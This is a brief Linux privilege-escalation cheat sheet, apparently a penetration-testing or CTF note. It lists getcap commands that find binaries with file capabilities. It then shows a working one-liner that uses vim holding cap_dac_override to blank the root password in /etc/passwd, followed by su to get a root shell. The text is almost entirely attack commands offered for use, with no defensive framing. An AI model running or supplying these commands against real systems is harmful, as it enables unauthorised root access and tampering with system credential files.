To find capabilities:
getcap -r / 2>/dev/null
To find:
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
To exploit cap_dac_override:
For example if it is vim:
getcap /usr/bin/vim.basic
/usr/bin/vim.basic cap_dac_override=eip
Because the binary has the cap_dac_override capability set, it can escalate the privileges of the user who runs it.
A system file can be modified with this capability. Modifying the root user in /etc/passwd allows for login without password.
echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwd
for non interactive method.
Then use su to get root access.